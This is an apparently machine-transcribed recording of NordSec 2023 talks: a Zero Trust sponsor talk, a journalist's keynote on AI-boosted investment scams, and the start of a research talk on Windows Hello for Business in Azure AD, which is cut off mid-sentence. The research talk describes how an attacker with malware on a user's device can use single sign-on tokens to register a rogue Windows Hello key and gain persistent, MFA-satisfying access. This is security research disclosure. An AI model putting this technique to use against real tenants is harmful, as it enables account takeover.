 Good morning, everyone. Good morning, good morning. All right, welcome to day two of Nordsec 2023. So just before we begin, I just wanted to reiterate the code of conduct. So some behaviors were reported yesterday. It's very important for us. It can get you expelled of the conference. Please behave accordingly. Do not over-consummate alcohol and just be respectful of everyone, or else you will be expelled from Nordsec. So after that's done, I want to welcome one of our sponsors, Zscaler, who's going to give you a brief talk, and then we'll start with the opening keynote of day two. Merci. Hello, everyone. Hope you had a great night last night. So just to introduce myself, I'm Sebastien Langlois, so I'm the leader for Zscaler in Eastern Canada, and we're really proud to sponsor the event. And I'm just before the keynote speakers, so I'll try to be brief there. I just want to present Jeff Yeats there that is our keynote speaker today. So thank you, Jeff, for being here. Just wanted to quick presentation. It's not going to be product related. Don't worry. It's not going to be marketing related. Just, you know, there's a hot topic that we're hearing, you know, from many customers, and a lot of board members, CISOs, the C-suite in most companies try to figure out what is Zero Trust, right? Who has heard about Zero Trust? Just raise your hand there. Well, everybody has heard about Zero Trust, and I'm pretty sure everybody has their own definition of Zero Trust, right? So I'll try to shed some lights around that. So just we did a survey in collaboration with a company, and 75% of organizations have some sort of a Zero Trust project, right? They're discussing Zero Trust, what it means for them, how we can implement Zero Trust, but only 14% of organizations have reported that they have done a Zero Trust deployment, right? And the reason for that is the lack of clarity, right? Everybody has their own definition of what is Zero Trust. You know, Zscaler, we had our definition. You talked to other vendors. We all had, you know, our own definition around Zero Trust, but now what's really cool is that there's a framework that has been built around Zero Trust, and I'll present you that framework. First, just before we start, right? John Kindervagg initiated Zero Trust in 2010, right? He was a Forester Analyst, and this is when Zero Trust was kind of created. And until two years ago, we didn't have any really framework. You can agree or not with the framework, but there was no framework. So everybody had its own definition about Zero Trust. But what we're trying to achieve from a Zero Trust perspective, you know, our son, our crown jewel, is your data, right? And what we need to protect is that data, and we have users that connect, that are using device, that connect to a network, to an application to get access to your data, right? So this is the five pillars of a Zero Trust foundation. It's identity, device, network segmentation, application, and data. So that's, you know, from a high level concept, from a Forester perspective, you know, the Zero Trust that was developed by John, and that we still use today. But the good thing is now everybody had their own definition of what is Zero Trust, right? And this came with a Zero Trust framework. We can have many discussion around the framework. Is it good? Is it bad? Should it be this? Should it be that? But at least now we have a framework, and this will work to improve that framework. And bottom line, you know, what you need to understand from this framework is most customers, you know, today you have users that connect to resources, and you have an enforcement point, which is a firewall, right? That is connected with your identity, and depending on your identity, you'll access the proper resources. You know, what NIS is bringing into the framework is a policy decision point, right? Which is a true policy engine, right? That understands the user, the device, the context, and that is integrated in constant feedback loops with your policy enforcement information points, right? Your endpoint, your SIM, all the tools you have that are able to detect something, you need to have a feedback loop between those system and the policy decision point, and from there, you know, depending on the user, the device, and the context of all that information that you have on the right, we'll be able to make good policy decision of who is accessing what and where. As an example of a policy, you know, a user could access an application, but when he's located in China, his subset of application that he can access is reduced, right? So we need to understand, that's an example of understanding the context, and the more context we have, the more information we have from those policy information points, the better decision we can make from a policy decision perspective. So this is really what you need to understand is before, you know, this is mainly where all customers are, and within the NISC framework, this is kind of the addition, which is the PDP and the PIP, okay? Really simple. So what does it mean? Very easy, right? You need to verify everything, every session needs to be authenticated, and we need to understand the context, right? From those policy information points. Once we understand that context, we control and we scan the traffic against all malware, known and unknown, and after we just enforce the policy, so we connect the user with the appropriate resources or our applications, right? So this is from a high-level perspective, what we're trying to achieve from a zero-trust perspective, and I think a picture is worth, you know, is worth any words there. Most customers today, this is still what you have. You authenticate the user, and the user is on the network and sees a lot of resources from that perspective, right? Not good, not bad. You know, most of the control points that we have today are bolted to the network, and every time you touch the network, it's complex, right? So, and you cannot stop the business, right? As a security person, you want to be there to support the business and not slow down them. So most of the time you'll be a bit loose, right? Because if you do too much changes on the network, you're going to break something and you're going to slow down the business. So what we're trying to do from a zero-trust perspective is just ensure that each user has access to the right doors. They need to do their job, right? So it's kind of like John Kindervack mentioned, it's the least privileged access that we're trying to achieve with zero-trust. And at the end, if you're successful in a zero-trust implementation, the users will access only the applications that they need to work. So this is no product related. Andrew's going to be happy, Andrew. He told me, said, don't talk about products, marketing and everything. So thank you for your time and just, Jeff, up to you. Thank you for being here and we're happy to sponsor the keynote this morning. Thank you. Hello. How's everybody doing today? Good. How's the hangover? Or do as a party last night? Just give me a couple seconds to get set up here. So thanks for coming out so early today. I'm betting a lot of you don't know me. So my name is Jeff Yates. I'm a journalist at Radu Canada, which is French language version of CBC. For a second. Oh, I'm going to have to... Sorry for this. Here you go. What? Okay. There you go. Please ignore the hire a hitman bookmark that's work related. I promise. I swear. This will make sense in a couple of minutes. Okay. So why do I have a hire a hitman? So, yeah, I work with the decryptor at Radu Canada, which is... So we're the team that looks at basically bad stuff online. So we cover disinformation, you know, fake news, stuff like that. We also cover online extremism, scams, stuff like that. So the hire a hitman obviously is not a real hitman. It's a scam website that I was looking at and forgot to remove the bookmark before coming here and freaking everybody out. So thanks to Hugo and Jean-Philippe for inviting me. I don't think Jean-Philippe made it. Nope. Okay, cool. I guess he had a bit of a party last night. So they wanted me to come and give you my perspective on the topic of AI. So I know this is a really loaded term. There's a lot of hype, a lot of moral panic around this. And I know that AI is probably not the correct term for what everybody's referring to. So I still think it's a useful shorthand for... So the generative AI tools that have been given to the public. So like ChatGPT, mid-journey stuff like that, that is causing all of this hype and panic. So I'm going to use AI as a useful shorthand for these systems. So that's what I'm talking about when I'm talking about AI. It's just like these tools that have been given to the public. So a bit of background about what we work on. A couple of years ago, we exposed a company working right here in Montreal downtown that was running subscription trap scams. They were making $100 million a year. They were working on Peel Street right downtown here. We uncovered this, the company shut down. So we were kind of happy about that outcome because this company was basically running fake Netflix-type websites. People would sign up and then their credit card would get charged and billed over months. That's how they made their money. We also, just this year, covered a network of criminals in Montreal that are operating those little scam texts that everybody gets. So you get a text on your phone that says you owe $300 for your power bill or stuff like that. They use a link that they then use to steal the person's identity. So we discovered this whole parallel economy in Montreal. These kids in Montreal that operate a lot of these scams. And they've built a whole parallel economy using stolen credit cards and stuff like that. So that's the type of stuff that we work on and that's the framework through which I look at these new tools that have been made available to the public. I think the kind of debate around these tools is a bit exaggerated. So if you look at the nightmare scenarios that are often in the media, sorry, you'll have something like this. So you have a deepfake of Joe Biden, yada, yada, yada, we're all dead. That's a simplistic framework that a lot of people think these tools are going to be used for. So they'll make political deepfakes that'll cause all sorts of political strife and stuff like that. That's possible. I'm not saying it's not going to happen, but I think a lot of the misuses of these technologies for political purposes are going to be much simpler and much less sophisticated than that. When I saw the first image generators come online last summer, I kind of had the feeling that these AI tools like Mid Journey would be used almost as political cartoons. So not necessarily to convince people of, you know, create a fake image and convince people that this is actually happening, but more to create a kind of an image of your opinion of what's happening in the world. So for example, a good example of this was when Donald Trump was arrested a couple months ago. People were creating these images showing Donald Trump getting arrested. So they're kind of creating these images as an idealized version of what they want reality to be like. So it's kind of like less using these tools to convince people and more to show your opinion like a political cartoon, basically, to kind of parody reality. The inverse opinion that I see from a lot of experts that I follow on Twitter is, you know, a lot of people say, well, these tools are just bad, they suck, right? They'll say, look at how many teeth this girl has. So they're like, how could anybody think that this is a real image? It will never convince anybody. This image that was shared by Donald Trump Jr. What the hell is this guy's face, you know? So there's an attitude that is very prevalent where it's like these things will never, or maybe not never, but as they are right now, they're not good enough to actually cause very important damage. ChatGbt, I've seen a lot of opinions that it's just a glorified autocomplete that makes a lot of mistakes and it really does. I asked ChatGbt to write a biography of me and it says I was born in 1980, not true. It says I went to University of Montreal, not true. It just says this really confidently. So a lot of people look at this and they're like, well, you know, this is not good. You know, if you get ChatGbt to write articles for you, whatever, it's just very low quality and most people would maybe be able to see through that. What I think though is that it's already good enough to cause damage because these systems are optimized for spam. So when you think about spam, what is it? It's low quality content that is cheap to produce and that can be, you know, sent to thousands, hundreds of thousands, millions of people. And well, these systems take one of the things out of the equation. So they make it extremely cheap to create infinite content and it's pretty much instantaneous. So it's perfect for spammers and people who are doing the click bait or stuff like that on social media. Now if you think who would want to click on crappy articles written by ChatGbt or, you know, images that have too many teeth and stuff like that, I invite you to go look at Facebook's most widely viewed content. They produce a quarterly report where they show the most popular posts on Facebook for the past three months. This was last report and you can see that the most popular stuff online is basically fish food, right? It's not good content. And so these systems are like perfectly adapted to create an infinite flow of content that people will mindlessly click on. We're already seeing ChatGbt being used for all sorts of spam online. So this is a funny situation where a lot of people use ChatGbt and they'll copy the whole thing and forget to not copy the regenerate response at the bottom. So if you search for regenerate response on Google, on Amazon or stuff like that, you'll see a ton of like these. This is a dropshipping type of operation that used ChatGbt to write some ad copy for their soap. This is a real estate listing written by ChatGbt, regenerate response. So obviously I think that these systems are already here. You might not see that much harm in spam. It's annoying. It's low quality crap that everybody says they don't click on it, but obviously people do click on it because it's often some of the most popular content on social media. Honestly, on a personal level, I think that this might one day make large platforms like Facebook basically unusable for people. So if you have infinite content, you don't know what is written by humans, you don't know if the pictures of the people are real, if the accounts are real, they can use ChatGbt to answer questions or direct messages. I can't show you this because we haven't reported it yet, but we did last week find a network of 300-something Facebook pages that are running thousands of ads on Facebook, all using basically these systems so they'll create the images with mid-journey. They'll answer comments using ChatGbt almost instantaneously. They'll answer direct messages. They don't speak English as a language, but they're able to have English-speaking content. They'll use ChatGbt to create these clickbaity articles. So I can't show you that because we haven't reported it, but it's already here. They're already using this for these purposes. And it's kind of funny because these clickbaity type of articles were kind of not in style for a couple years, like Facebook and Google kind of cracked down on this type of content. Google demonetized or said they wanted to demonetize clickbait websites and stuff like that. Facebook said that they cracked down on this type of content. We're seeing a resurgence of this now because it's so cheap to produce using these systems so you don't have to pay someone $5 an hour to write articles anymore. You can just generate them automatically and you can have an infinite amount of content. So I think it's going to be a problem in the upcoming months, years for people who use social media. I don't know what it's going to do. It'll be interesting to see how the platforms actually react and try to moderate this new reality, but it's coming fast, that's for sure. But I want to drill down today on one specific case where I see this already being used and I can see kind of future potential uses of these technologies to cause some real damage in the world. So I want to talk to you about the world's biggest scam. I started covering this scam two years ago. When I first realized how massive this scam is, it completely blew my mind. I had no idea that this existed. It's under our feet. It's a massive fraudulent industry that steals billions of dollars from normal people every year. And not many people are talking about this. Unfortunately, it's really hard to get the word out on this. And unfortunately, world governments aren't really acting either. So the scam is pretty simple on the surface. So people will end up on a trading website that looks legit. They're often promised that they're going to be making 200, 300 percent returns. They're asked to put in a small amount of money to invest, usually $250. When they do invest, so they send money, they're shown a trading platform that looks real. It shows their investment. It's all fake. So the people running this scam, they can show the user absolutely anything on this. So the person usually puts more money, puts more money, more money. They have an investment agent that calls them basically every day. Some of these victims form relationships with these agents. They feel like they're almost a member of their family. I've seen cases where this goes on for a year. So they'll call the person, how's your kids doing? Okay, cool. Yeah, you should invest because, look, you made a lot of money last month and you should put more money, more money. And these people get absolutely cleaned. They lose everything. So at Radio Canada, we talked to Joanne Gantzi, a woman from Utawe region. She lost $250,000, basically all her home equity gone to this scam. We spoke to Fernand Laroche. He lost a million dollars. His entire life savings completely wiped out because he thought he was investing in Bitcoin. You know, I get that most people here would probably not fall for this type of scam and you're probably thinking these people are kind of dumb for clicking on this. This guy's a psychologist, you know, like, he's not dumb. Maybe has a bit of trouble understanding how the internet works or how crypto works or stuff like that, but a lot of people are getting wiped out by this. In Canada, just last year, the amount of money lost in these frauds doubled in Canada, so it was almost $100 million lost. And this is an understatement. Even the government admit that it's only five or 10% of victims actually report being a victim of this type of scam. Average victim loses $70,000, so that's a considerable chunk of change. If you're interested in this scam, I invite you to watch this documentary from BDC. It was made by Simona Wineglass, who we see here. She's an absolute beast of an investigative reporter. She works at the Times of Israel, where this fraud started, basically. And so in this documentary, she uncovers one of these criminal gangs. She finds out that it's being run by an ex-politician in Georgia. It's really wild stuff. I really, really recommend watching it. But just to give you a quick idea of what we're talking about here, Simona describes it as the Uber of fraud. And it really is that it's applying the lessons of big technology to fraud. So a lot of people, when they imagine fraudsters doing this type of stuff, they imagine a couple guys in a basement with hoodies on that are stealing these people's money. It's not that. It's an industry. So there's like, we don't know exactly how much, but between 10 and 15 of these criminal gangs running these scams, they have dozens of call centers. Each call center has like 100, 150 employees. They're salaried people. And this is a business. And they've also now started doing is they've basically Uberized this system. So it's kind of like fraud as a service, basically. So how it started was in Israel, they used to run these call centers, running what's called a binary option scam. So basically it's a way of betting on the stock market. So you bet that the stock goes up or the stock goes down and you either win or you lose. Most people lose money. What happens is these guys realize that most people lost money. So that's good for them. And if people win money, you can just not give them their money. So that's how this scam started is basically when people made gains, they would stall. They would say, oh, we need KYC. No, your client. You'll need to pay income tax. You need to pay the Israeli income tax on your on your gain stuff like that. And if all else fell, they could just close the website and start a new one. It costs nothing to start websites. 2017 Israel ban binary options. So they had to find something else. They started doing crypto. So if you've ever heard of the ICO boom in 2017, 2018, a lot of these guys were into that. But they also developed a system where they sell their, they sell this fraud as a service. So instead of running the call centers themselves, they basically sell it as a service. So for a fee and a cut of the profits, they'll help you set up a call center. They'll help you train. They'll help you train your employees. They'll help you launder your money, show you how to do it in a way that is safe or safe ish. And so in the past five, six years, we've seen a lot of these call centers popping up pretty much everywhere in Europe. We've seen some in Lithuania, Poland, Ukraine. There was a couple last month in Malaysia that got busted. There's even some in South Africa. So it's all these criminal operations run remotely like that. It's basically a massive, massive, massive industry. On this live stream from Offshore Alert, Ken Gamble, who's a fraud researcher in Australia, he basically, this was three or four years ago, he was basically saying already that this fraud had basically escaped most government's ability to do anything. Because the money travels so fast, it goes from bank account to bank account to bank account, it's almost impossible for local police to actually investigate these crimes. One of the really messed up things that these criminals do is... So when you sign up to the platform, they'll ask for KYC, because they act like they're a legitimate financial service. So they'll ask for photo ID for all your personal information, date of birth, social security number. They don't care about doing KYC, obviously they're criminals. But what they will do is they'll use that information to open a crypto account on Kraken or crypto.com and then use that to launder money. And then once they're done with it, they'll actually sell the personal info on the black market so they'll make even more money with the info that they stole. It makes it almost basically impossible for local police officers to do anything. So if they've managed to track the crypto payments to the crypto exchange, well, the person who cashed out is basically someone whose info was stolen by the same criminal group. So it makes it exceedingly hard and most countries don't really do anything. The U.S. is one. These criminals don't accept U.S. clients. So if you go on the website using a U.S. IP, their Geofence, you can't go there. To sign up, you have to swear that you're not a U.S. citizen. They're extremely afraid of the U.S. One reason is a couple of years ago, one of these crime bosses, she went to the U.S. to visit her family and she got picked up 22 years of prison in U.S. prison. So they're very afraid of the U.S. Germany is doing some pushback on this fraud. There's been a couple crackdowns in call centers in the past two years in Europe. There was one a couple of months ago in Lithuania and Serbia, I think. But most countries aren't doing anything. I can tell you that Canada is not doing much of anything for these frauds, unfortunately. So the victims we spoke to, they're talking to a wall. Basically, they lost their life savings and they're being told by the police that there's nothing to be done. They can't do anything. Why am I talking about this? Why did I talk about this for the last 15 minutes when I'm supposed to be talking about AI? It's because this whole sophisticated industry of fraud has one major entry point. So I described the back end. The front end looks like this. It's Facebook ads, basically. So it's these Facebook ads that usually have a local celebrity. So they'll target Canada with... 90% of the ads have Elon Musk. But they use local politicians in Canada to try to get people to click on these ads. They use local celebrities. I saw one two days ago with Seth Rogen. So they'll try to convince people to click on these ads using local celebrities. When you click on the ad, you get sent to a fake newspaper article that says, oh, you know, Elon Musk invented a new way to make money. Click on this. And then you're sent to the actual fraud. Now, I know once again, most people here would never fall for this. And you probably think it's ridiculous. This works. This works extremely well. It's really hard to pin down how much money these criminals make. But upwards of $10 billion a year, probably more. One of the criminal groups, the biggest one, makes $1 or $2 billion a year. And it's not the biggest one. So it's extremely massive. And the entryway into these scams is really simple. It's spam, basically. It's really low quality. Most people would read this and realize that it's complete crap. But unfortunately, it works. And we often say, well, if you sign up for this, you should have done your own research. You should have tried to at least know what you're investing in. Here's one of these crime products called Quantum AI. So let's say you're someone who sees this and you're like, oh, I want to look at what this is. So you Google Quantum AI. And every single result on the first page is ads bought by these scammers. And there's actually one real result on the first Google page. It's for a Google product called Quantum AI as well. So these people beat Google at their own SEO on their own platform. And so how I'm tying this into AI is that these ads are not run by the criminals themselves. They're run by affiliate marketers. So these crime syndicates don't run their own ads because they want plausible deniability. So they'll pay affiliates. Often people in countries like Bangladesh, Pakistan, Vietnam, stuff like that, who will run these ads on Facebook for them? This is really lucrative for the people running the ads. So this was on an affiliate marketing website yesterday. The payout is $1,250. So if you manage to get someone to click on your ad and make a minimum deposit of $250, you get $1,200 US. That's a lot of money in a lot of countries. And if you can get a lot of people to click on these ads, you're going to make a lot of money. These systems, the AI systems like ChatGPT, they're a boon for these people. Oftentimes they don't speak English. They don't know the local culture or political context, and they want to create ads that will make people click on them. So already they can use systems like the Bing AI or ChatGPT for that now can browse the internet to ask for what's the biggest news stories in Canada today and craft ads with that. They can use, of course, ChatGPT to create the actual ad copy. The only thing holding these scammers back was that it cost money to create these ads, right? So they would have to pay people on Fiverr to write these fake news articles that cost money that takes time. Now they can just do it automatically with these systems. They can create images, of course. And we're already starting to see these scammers use the AI systems to run their scams. This is one I saw on Twitter a couple days ago. This is clearly written by ChatGPT. You can just sense it. ChatGPT has a certain style to it. So they're already starting to use this to write these ads, to write these articles. I saw one yesterday. I don't know if it'll play. No sound, okay. So it's a deep fake of Tucker Carlson. They used Eleven Labs, which is a vocal cloner to clone his voice. And he's talking about how Elon Musk created this wonderful new way to make money. Once again, I don't think most people here would fall for this. The lips are kind of off. But these things work. They've been working for years. It's just like another tool that they're going to be using to ruin people's lives, basically. And basically, the last frontier that these scammers had was it costs money and time to create the content to get people to click and sign up to these frauds. And that barrier is now gone. Just to finish up, it's not just using these tools to create content for people to click on. They're already using AI in their ad campaigns. So crypto is kind of down. There's less of a buzz on crypto lately. So they've started, of course, including ChatGPT and OpenAI in their ads, because that's the new hotness. People want to invest in this. So, yeah. So basically, I'm personally kind of worried about where this is going. It's already a huge problem. It's already a problem that is exploding. What we're hearing is these criminals are targeting Canadians specifically. Canadians are a prime target for these frauds because authorities aren't very aggressive in pursuing the people behind this. And Canadians, Canada is a relatively rich country. And so our citizens are being targeted by these massive criminal gangs. And I just want to finish on this. Often with fraud, we're under the impression that it's just too bad, but it's money stolen and you can always make more money or whatever. But these are criminal gangs. They use this money to finance corruption in certain countries. They're paying off authorities to run their call centers. It's organized crime. So there's always the violence, the presence of violence in these circles. So the money that's being stolen from basically Canadian retirees is going to these criminal gangs and financing criminal activities overseas. So it's a huge problem. And unfortunately, these systems have basically given them a huge gift to continue doing their operations and nuking people's lives, unfortunately. So that's all I had to say about that. Thanks. Thanks. Thanks for coming out. Oh, yeah. Oh, let's paddle these screws. I don't hear you. Hello, hello, hello. All right. So moving on from the keynote, we have a vulnerability research block of two talks. And here I have my moderator for the vulnerability research block. So after particularly enjoying his master's degree on symbolic execution of binary software, Philippe Pépos-Betzklai is now a PhD candidate obsessing over automatic antivirus evasion. He's worked on red and blue teams. He's a founding member of Resilience Co-op and a member of the Eternals Seconds, a hack and CTF team who participated in Nortec for multiple years. So welcome, Philippe. Enjoy. Thank you, Igor. So we have a very cute block with two very nice speakers that have presented something that was really cool. So first up, we have Dirk Jan, that will, well, you probably know him already, so I won't take too much time. But he's a hacker security researcher, a red teamer. He's been Microsoft's most valuable researcher multiple times. And he recently started his own company, 2022, if I remember correctly, which is called Outsider Security. So I'll leave you guys with you with Dirk Jan. He actually is here. He usually works on Active Directory security, Azure AD, stuff like that. So today he's going to give us his little deep dive on Windows or Microsoft Hello. So the floor is yours. Amazing. Thank you. All right. Good morning, everyone. Today we're going to talk about Windows Hello. I had to make some pun with hello, so call it hello from the other side. I'm not going to sing. No one's going to want that. A little bit about me. I'm Dirk Jan. I'm from the Netherlands. Last year I started my own company. I do a bit of a mix of research, consultancy, pentesting, and also trainings on Azure AD. I really like to research these things. Most of my time researching, I first built some tools, and then I used the tools to analyze, like, okay, how does this actually work? So that means I wrote quite some tools. Almost all of them are available as open source tools. I have a blog where I write about these tools. I have a Twitter account where you can stay up to date with my research. So if you want to follow me there, go ahead. In this talk, we're going to cover quite a lot of content. I'm going to start with explaining some of the Windows Hello for Business concepts. I'm going to shorten it to WHFB from here on, because writing it out is going to be very long. I'm also going to shorten it to just saying Windows Hello instead of Windows Hello for Business. Technically, there are some differences, but for our purposes, just call it Windows Hello. I'm going to look at, like, what flavors of Windows Hello there are, how you can deploy it, how they work on a technical level, and what we can do with it, or what we could do with it, which also involves, like, bypassing things, multi-vector authentication, lateral movement. So a lot of fun. For those of you who don't know exactly what Windows Hello for Business is, basically it's one of Microsoft products which allows you to go passwordless. So instead of using a password, Windows Hello uses cryptographic keys that are stored hopefully securely on your device, and then you can basically unlock that key either by biometrics or via a pin or with a fingerprint or something, and then you can authenticate. And each device that you're using that uses Windows Hello, it has a separate key, and that key can be used to authenticate things like Azure Active Directory. There's also flavors that are purely for on-prem Active Directory, but in this talk, we're mostly focusing on Azure Active Directory and on some hybrid parts in which Azure Active Directory is actually the key component. So there's some prior work that this talk is partially based on. The most interesting one is, I think, the talk, Exploiting Windows Hello for Business by Michael Grafnetter. It's from a couple of years ago from Black Hat Europe where he presented about the Windows Hello for Business internals in Active Directory. And this was the inspiration for the shadow credentials attack, which you may be familiar with, which is basically an attack for on-prem Active Directory. There's also been quite some research in bypassing the facial detection of Windows Hello on how it actually works with the TPM and stuff. Benjamin Delphi did some research on the Windows internal things, how the internal things are handled, but I couldn't really find anything that was specifically on how Windows Hello works with Azure AD. So I basically started researching that. And before I started, I was like, OK, what's the key protections and the key components? And basically came up with this list. This is mostly what Microsoft Advertises is at. So Microsoft basically says, OK, Windows Hello for Business. It provides strong phishing resistance, multi-factor authentication. So it's very secure, obviously. One of the reasons why it's so secure is because you need MFA to provision it. So it works as a second factor. It's bound to a specific device. So you cannot just steal it and use it on some other device. And they also focus heavily on hardware protection of keys. So they store these things in a trusted platform module, which prevents attackers from extracting the keys, even if they have full control over the operating system. And this all makes it much more secure than password authentication. So keep this list in mind because we'll get back to it later. And there's a couple of flavors that you can deploy Windows Hello for Business as. So we're focusing mostly on the Azure AD native scenario today. But there's also some hybrid scenarios and a way that you can deploy it in Active Directory only. The thing is, if you're using Azure Active Directory, then you already have Windows Hello for Business basically, whether you're actively using it or not. It's always enabled. I haven't found a way to disable it. I don't know if it's even possible to disable it. So if you are using Azure Active Directory, then you have Windows Hello for Business. All the other flavors that work in hybrid configuration, they require some sort of configuration. So unless someone specifically configured that, then you usually don't have it in your network. But the Azure AD native one, it's always there basically. And there's a few components that are important if you have Windows Hello in Azure AD. So you always need some device. So these could be Azure AD joined or registered devices. So they could be managed using MDM, such as InJune, for example. And then Windows Hello for Business and Romans will take place as the final part of the Windows setup. Or alternatively, if it's enabled later on, then the OS will basically prompt you to replace your signing credentials with Windows Hello for Business. And that will show the following screen. I'm using Windows 11 just to show that this works on the most modern version of the operating system. So basically it will give a pop-up and say, okay, well, you signed in with your password. Now let's set up some biometrics authentication or PIN authentication to use Windows Hello. It will then prompt you for multi-vector authentication. So an important part is that to unroll these things, you normally always need multi-vector authentication. Of course, we'll look into how that works a bit later on. And once you enter the multi-vector authentication, then it prompts you to set up a PIN so that PIN you can use on the device to basically unlock the keys and then authenticate. You can also use that with a fingerprint or whatever is present on your system to unlock these keys. And there's some technical components involved here. And one of these is the device identity. So in Azure AD, each device that's registered has an identity that basically uses public and private keys to prove the device identity. And using the device identity, the device can request a primary refresh token. So primary refresh tokens are basically tokens that are stored on your device with which you can use single sign-on to all Azure AD connected resources. So once you have a device that has a primary refresh token, you no longer need to sign in every time or do MFA every time, it's tied to your device. And also an important component is a trusted platform module because all of these above keys, they are protected by hardware if you have a TPM or your system. So that's the device key, the session key of the PRT and the keys that pack the Winner's Hello for Business component so that ensures the security of these keys. So if we look at the technical flow, basically that happens when we configure Winner's Hello for Business and we see that it starts with a request for that MFA upgrade. So if you set up your device, you will first enter your username and password and then it will ask you for additional MFA to provision this key basically. And how it does that is it puts in the request a value which says AMR values as NGC MFA. And that's a kind of a special parameter which indicates that for this next step we need like a fresh MFA token. So of course if you are already signed in for a long time then MFA is usually cached in the browser or on your device but NGC MFA means that it should be a fresh MFA so you will get interactively prompted whether or not you already did MFA like five minutes ago or not. And this indicates that there should be a fresh like MFA prompt. NGC actually stands for Next Generation Credentials and this is a term that we'll see more often. So internally Microsoft calls Windows Hello for Business keys, NGC keys and the NGC MFA is also like where this term is used to indicate that this is MFA to provision like a Next Gen Credential so it's to provision a passwordless credential set. And if we use this NGC MFA authentication that's basically reflected as a claim in the access token that we get. So if we decode the access token that results from this authentication we see that we authenticated with the passwords. There's the RSA which means that we did the device authentication as well and also the MFA and NGC MFA claims so that indicates to the receiving service that I just did a fresh MFA evaluation and that my MFA methods are actual and not just some cached MFA. So if we want to provision a Windows Hello for Business keys there's a few technical requirements. So these keys need always to be from a certain device so you need to do the authentication from a joined or registered device and basically that will get you a device ID claim in your token so you cannot just like login on the browser and then start provisioning Hello keys you need to do that on a registered or joined device. It should also contain the NGC MFA claim in the token so that means that you performed MFA like within the past about 10 minutes I don't know what the exact time is and of course you need a token for the right service and in this case the service that handles this key enrollment is the device registration service which lives on the enterpriseregistration.windows.net So we have a look at how this key is registered and we found out that it's actually like a very simple post request like all it does is like here I have an access token here's my public key that's just a RSA key that's encoded in a specific way and that's it and I was a bit surprised by this because of course Microsoft is very big on the whole hardware protection keys need to be in a TPM and the registration is just oh here's public key that's it there's no proof that this key is in like in a TPM there's no attestation going on it just here's an access token here's a key good luck all right so the response basically is just a status that hey the key is registered and here's some additional context we don't need this context in most cases it's needed for some specific hybrid scenarios in this case we just can ignore it because our key has now been provisioned and we can authenticate with this RSA key that we've registered so to do that that's basically a PRT request so if you're familiar with how primary refresh tokens are issued it usually goes via a request that involves a JSON web token bearer and that's a signed request using the certificate of the device to prove that it's from a legitimate device and it's just a OR request to the token endpoint and it contains this request which is like an embedded JSON web token and if we decode that we see that in the header we have the device certificate so that's to indicate to Azure AD it's this device that's doing the request the device also signs this JSON web token so that Azure AD can validate it and in the payload we see a few parameters one is a nonce so that's a very common thing just to make sure that you cannot do a replay attack because the nonce expires after a few minutes the username that we're authenticating as so in this case the TPM test user and we have an assertion which is another JSON web token so if we take the JSON web token out of the JSON web token then we actually see the part that's actually signed with the Windows Hello key so you see in the top you see the key identifier so that indicates which key was used to sign this the use is NGC so that's the next gen credential key that indicates that hey this is token from a next gen credential and in the assertion we see a timestamp that is again against replay attacks because the assertion will expire after a certain time and it also contains the tenant ID so that Azure AD knows like this request goes to this Azure AD tenant so if we send this request then we basically get a response the response will be encrypted but the device can then decrypt that and then we get a primary refresh token we get an encrypted session key that's needed to use the primary refresh token and we also get some Kerberos things we'll get into the Kerberos part later the important part is that with this Windows Hello key we can get a primary refresh token and a primary refresh token session key so I integrated this flow into my road tools set in ROTE-X specifically so ROTE-X now supports like generating these keys and rolling the keys and also getting the tokens that are required to and roll these keys so that means it's a token with the fresh MFA upgrade so to say so just to demonstrate that with this short video we're going to start with requesting a normal primary refresh token so this is one with just a username and passwords we need to enrich that with the MFA claim so it will automatically prompt us for MFA we'll enter the MFA in there and that will give us a new token and with this token we can basically provision a new Windows Hello key so we provisioned it and then we can authenticate with this Windows Hello key and get a primary refresh token and with the primary refresh token we can get new tokens that include this the authentication methods RSA and MFA which indicates that this was a Windows Hello authentication because it was done using a private key which also counts as MFA it means that it's we didn't use passwords but we used a key to authenticate the user so we can do this whole flow with ROTX if we want so there's a few interesting observations in there so first of all this full provisioning process so deciding to start using Windows Hello it's completely controlled by the client I mean you can set as administrator you can set policies whether you want to use Windows Hello for business or not but if you're using Azure AD devices only it's basically always enabled so if you can convince your device to start the enrollment you can do it whether it's enabled or not it's fully up to the device to do it or not and of course any device and user combination in the tenant can create these keys and can register these keys on users so you don't have a lot of control over this and going back to this quite simple creep provisioning protocol there's some interesting basically there's two parts one is the key and one is the token so I had a look at how this token works and I found out that you didn't actually need this NGC MFA claim so you could just register a key with a normal token with normal MFA so you did need multi-effect authentication but it didn't need to be recent so you could have some cached MFA claim in the browser and that you could use to also provision a new key so if you are an attacker and you have access to a sign-in browser session or you are on a user's device already then you can just use a single sign-on token or a cached token somewhere to actually provision a new key without needing to do this MFA process again so just an example of an attack in this case we are using the most recent version so the Windows Allow for Business keys are safely stored or protected by the TPM and the LSS process can access them but we cannot extract these keys but if you are as an attacker running some malware on this laptop you can basically ask LSS for some single sign-on data you can say hey I want the token to this specific service in this case the device registration service with which we can provision a new key and then basically we can get the token we can register a new key and now we have a key that we generated ourselves so it's no longer in the TPM we don't need to bother with trying to extract this TPM from a TPM we don't even need admin privilege to do this you can do this from a normal user session and then basically you just register a new key that can be used to authenticate as that user so just to show this I'm using RodeToken which is a tool I wrote quite a while ago to request this single sign-on data there's some references here on my blog there's also some alternative methods to do this but basically I get a single sign-on data or POT cookie as it's called and this I can use with RodeTX to get a token for the device registration service so the device registration service token is needed to provision that key then I get the token, I store the token on disk and with this token I provision this new key so it saves the key to disk it sends the post request using the access token that we just got we didn't need to authenticate we just asked the operating system for hey give me a token for this using single sign-on and then overwrite new key so we can get a PRT with this with this key and basically now we have a primary token with which we can do single sign-on as the user it's valid indefinitely we can do re-authentication because it counts as a multi-factor authentication we can put this somewhere it's not protected by anything it's quite hard for the user to see actually that they have a new Windows Loaf or Business Key enrolled and we can just get tokens for it we can use this in a browser whatever we want we can access anything as the user basically at this point the short version it was possible to basically overwrite the key from a device using single sign-on which basically completely defeats this protection of the TPM because it doesn't matter if the key is in the TPM if you can just provision a new key that you control this provides persistence for attackers pretty easily because the new key is wherever the attacker decides this and an interesting thing is that a Windows Loaf or Business Key can be used with any device so rather than the key being specific to a device the key is valid for any device in the tenant so you will need to have a real device or a fake device as an attacker but any device will work with any key as long as you have the key material and there's also some tricks that you can basically restore the original key from the original device so that the user device will keep working and you just have an additional backdoor key there basically one good into it but it's possible so there's some aspects here left so of course we also have Windows Loaf or Business from the perspective of Azure AD itself so how does Azure AD store these credentials and it turns out that the keys are stored on a user property called searchable device keys this is visible the best in the internal version of the Azure AD craft and 